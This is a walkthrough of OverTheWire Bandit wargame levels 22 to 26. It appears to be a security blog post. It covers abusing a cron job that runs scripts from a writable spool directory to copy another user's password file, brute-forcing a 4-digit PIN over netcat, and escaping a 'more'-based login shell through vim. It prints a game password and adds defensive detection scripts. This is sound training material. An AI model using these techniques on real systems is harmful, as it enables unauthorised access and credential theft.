Overthewire – Bandit Walkthrough (22-26)
Hello friends! Today we are continuing to solve Bandit’s levels, starting from Level 22. If you haven’t seen the previous parts, it is strongly recommended to view Part 1 and Part 2 first.
Level 22-23
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.
Again, we need to change our present directory to ‘/etc/cron.d’. Let’s list out the files; here we can see that there is a file ‘cronjob_bandit23’. Read this file and we get the path of the bash script.
cd /etc/cron.d
ls -la
cat cronjob_bandit23
cat /usr/bin/cronjob_bandit23.sh
echo I am user bandit23
echo I am user bandit23 | md5sum
echo I am user bandit23 | md5sum | cut -d ' ' -f 1
Reading this bash script, we see that it builds the string ‘I am user <username>’, hashes it with md5sum and uses the hash as the name of a file in /tmp. Here the user is bandit23, because we need to find the password for bandit23. Just following the pattern of this script, we are able to generate the path of the password file.
cat /tmp/8ca419486bfbbc3663ea0fbe81326349
Now we can read the password file using cat.
ssh bandit23@localhost
Level 23-24
A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.
NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!
NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…
Again, we’ll change our directory to ‘/etc/cron.d’ and list out the files present there. We find a file named ‘cronjob_bandit24’. Reading it gives us the path of a bash script.
Let’s see what it does.
cd /etc/cron.d
ls -la
cat cronjob_bandit24
cat /usr/bin/cronjob_bandit24.sh
We can see that this script executes and then deletes every script present in ‘/var/spool/$myname’.
So, first make a directory in ‘/tmp’ and write a bash script using nano.
mkdir /tmp/Ignite123
cd /tmp/Ignite123
nano bandit24.sh
Here, I’m instructing it just to read the file bandit24, which is present in the ‘/etc/bandit_pass’ directory, and append its contents to ‘/tmp/Ignite123/level24’.
//CODE
#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /tmp/Ignite123/level24
‘>>’ redirects output to a file, appending the redirected output at the end.
Now change the permissions, then copy this file to ‘/var/spool/bandit24’. The cron job runs as bandit24, so ‘/tmp/Ignite123’ must also be writable by that user for the output file to be created.
chmod 777 bandit24.sh
cp bandit24.sh /var/spool/bandit24/
chmod 777 /tmp/Ignite123
Wait for a minute so that our script gets executed and gives us a result. List the files and we will see a file named ‘level24’. Read the file using cat.
ls
cat level24
The above password can be used to connect to bandit24.
ssh bandit24@localhost
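To make the mechanism of this level concrete, here is an added illustration, not the game’s own cronjob_bandit24.sh (whose exact contents are not reproduced above): a minimal model of a job that runs every file in a spool directory and then deletes it, together with a check for the property that makes such a job dangerous, a world-writable spool directory that lets any local user plant a script the job will run with its own privileges. The scratch directories, the dropped script and the marker text are all constructed for the demonstration.

```bash
#!/bin/bash
# Added illustration (not the game's own cronjob_bandit24.sh): a minimal
# model of a "run every file in a spool directory, then delete it" job.
# The only detail taken from the page is that the job executes and removes
# whatever scripts are found in /var/spool/$myname.

# Report whether a path is world-writable: the property that lets any user
# drop a script that the job will then run with its own privileges.
is_world_writable() {
  # 9th character of the ls -ld mode string is the "others write" bit.
  [ "$(ls -ld "$1" | cut -c9)" = "w" ]
}

# Execute every regular file in the spool directory, then delete it.
# Scripts are run through sh (a simplification; the real job needs them to
# be executable) and, where GNU timeout exists, with a per-script limit so
# one hung script cannot block the rest.
run_spool_once() {
  spool="$1"
  for f in "$spool"/*; do
    [ -f "$f" ] || continue
    if command -v timeout >/dev/null 2>&1; then
      timeout 5 sh "$f" >/dev/null 2>&1
    else
      sh "$f" >/dev/null 2>&1
    fi
    rm -f "$f"
  done
}

# Self-contained demonstration: a constructed spool directory, a dropped
# script that writes a marker, one pass of the job. Prints the marker.
demo_spool() {
  work="$(mktemp -d)"
  mkdir "$work/spool" "$work/out"
  chmod 777 "$work/spool"     # deliberately world-writable, as in the game
  cat > "$work/spool/drop.sh" <<EOF
#!/bin/sh
echo "secret-from-constructed-file" >> "$work/out/level24"
EOF
  run_spool_once "$work/spool"
  # After one pass the dropped script is gone, but what it wrote remains.
  [ ! -e "$work/spool/drop.sh" ] || return 1
  cat "$work/out/level24"
  rm -rf "$work"
}
```

The same two functions explain both notes in the level text: the job deletes your script after running it (keep a copy), and the spool directory has to be writable by you for the drop to work at all. On a real system, is_world_writable run over the directories named in /etc/cron.d entries is the check a defender would want.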
Level 24-25
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.
Here, I tried to see how the things are working.
nc localhost 30002
cd /tmp/Ignite123
nano brute.sh
We can see that after the password and a single space we need to give the 4-digit pincode.
So, we need to write a bash script that brute-forces the pincode.
As before, go into our working directory and write a bash script using nano.
//Code
#!/bin/bash
# bandit24's password, obtained in the previous level
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
# brace expansion produces every 4-digit string from 0000 to 9999
for i in {0..9}{0..9}{0..9}{0..9}
do
echo "$passwd $i" >> output.txt
done
In the script, we use a for loop with brace expansion so that every digit is generated in each of the 4 places, giving all 10000 possible combinations.
Make the script executable and execute it.
chmod +x brute.sh
./brute.sh
ls -la
As we can see, a file named output.txt has been created and it contains all the possible 4-digit combinations.
Now we just feed the output file to netcat and save the daemon’s responses in a result.txt file.
Sort the content of the result file and find the unique line; every wrong guess produces the same reply, so the one line that differs carries the password.
cat output.txt | nc localhost 30002 >> result.txt
sort result.txt | uniq -u
Hurray, we got the password for bandit25.
The above password can be used to connect bandit25.
ssh bandit25@localhost
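The defensive counterpart of this level, as an added example that is not part of the original post: a small detector that reads attempt logs and flags clients with a burst of failed attempts, which is what a 10000-guess search looks like from the daemon’s side. The real daemon’s log format is not shown on the page, so the ‘<time> <client> <result>’ format and the sample lines are constructed.

```bash
#!/bin/bash
# Added example (not from the original post): detection logic for the kind of
# brute force this level performs. The daemon on port 30002 produces no log
# that the page shows, so the log format below is constructed for illustration.

# Constructed sample log: one line per attempt, "<time> <client> <result>".
SAMPLE_LOG='10:00:01 10.0.0.5 wrong
10:00:01 10.0.0.5 wrong
10:00:02 10.0.0.5 wrong
10:00:02 10.0.0.5 wrong
10:00:03 10.0.0.5 wrong
10:00:03 10.0.0.5 correct
10:00:09 10.0.0.7 wrong
10:00:30 10.0.0.7 correct'

# Read log lines from stdin; print "<client> <failures>" for every client
# with more than $1 failed attempts. A 4-digit pincode has only 10000 values,
# so a legitimate user never needs more than a handful of tries; a burst of
# failures from one client is the signal to alert on or to rate-limit.
flag_bruteforcers() {
  threshold="$1"
  awk -v t="$threshold" '
    $3 == "wrong" { fails[$2]++ }
    END { for (c in fails) if (fails[c] > t) print c, fails[c] }' | sort
}

# Convenience wrapper that runs the detector over the constructed sample.
flag_sample() {
  printf '%s\n' "$SAMPLE_LOG" | flag_bruteforcers "$1"
}
```

With a threshold of 3 the sample yields only 10.0.0.5, the client that walked through several wrong pincodes in two seconds; the occasional mistyped pincode from 10.0.0.7 stays below the line.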
Level 25-26
Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.
First list out the files; it’s our first step when we don’t know how to proceed.
Then try to connect to bandit26 using the private key file.
ls -la
ssh -i bandit26.sshkey bandit26@localhost
Alas! The connection gets terminated.
According to my experience, I go into the ‘/etc/passwd’ file.
cat /etc/passwd
The /etc/passwd file is used to keep track of every registered user that has access to the system, including each user’s login shell in the last field.
Here, we can see that the shell of bandit26 is a file in /usr/bin.
Just read this file and we can see that it is a script that runs ‘more’.
cat /usr/bin/showtext
Let’s learn more about ‘more’.
man more
‘more’ only stops and waits for input when the text is longer than the screen, so to get its prompt we just need to reduce the size of the terminal.
Let’s try to connect again, and make sure you have reduced the size of the terminal first.
ssh -i bandit26.sshkey bandit26@localhost
Here, we can see that ‘more’ is activated. Just press ‘v’ to open the file in vim.
Type these commands to gain a shell.
:set shell=/bin/bash
:shell
ls -la
cat README.txt
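The lesson of this level is that a pager is not a restricted shell: ‘more’ lets the user press ‘v’ to reach an editor, and the editor can spawn any shell, as the commands above show. An added example, not from the original post: a parser for /etc/passwd-format lines that reports every account whose login shell is not on an allow-list, which is the check that would have surfaced a shell like /usr/bin/showtext. The passwd excerpt and the allow-list (standing in for /etc/shells) are constructed, and the real bandit26 line is not reproduced.

```bash
#!/bin/bash
# Added example (not from the original post): parse /etc/passwd-format lines
# and report accounts whose login shell is not a real, approved shell. The page
# shows that bandit26's "shell" is a script around more, and that more lets the
# user reach an editor and from there a shell; so any non-standard login shell
# deserves a look. All input below is constructed so the check runs offline.

# Constructed /etc/passwd excerpt (the real bandit26 line is not reproduced).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1001:1001::/home/alice:/bin/bash
restricted:x:1002:1002::/home/restricted:/usr/bin/showtext
pager:x:1003:1003::/home/pager:/usr/bin/more'

# Shells an administrator considers legitimate (stand-in for /etc/shells).
ALLOWED_SHELLS='/bin/sh /bin/bash /usr/sbin/nologin /bin/false'

# Read passwd lines from stdin; print "<user> <shell>" for every account whose
# 7th field is not in the allow-list. An empty shell field is reported too,
# since login then falls back to /bin/sh (see passwd(5)).
odd_login_shells() {
  awk -F: -v allowed="$ALLOWED_SHELLS" '
    BEGIN { n = split(allowed, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    NF >= 7 && !($7 in ok) { print $1, ($7 == "" ? "(empty)" : $7) }'
}

# Convenience wrapper over the constructed excerpt; on a real system you would
# run: odd_login_shells < /etc/passwd
odd_shells_in_sample() {
  printf '%s\n' "$SAMPLE_PASSWD" | odd_login_shells
}
```

Against the sample the check reports the two accounts whose shell is a pager or a wrapper around one; for those, the question to ask is whether the program can be talked into running an editor or a shell, exactly what this level demonstrates with ‘more’.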
Author: SOURABH is an Information Security Analyst | Pentester | Researcher.
The post Overthewire – Bandit Walkthrough (22-26) appeared first on Hacking Articles.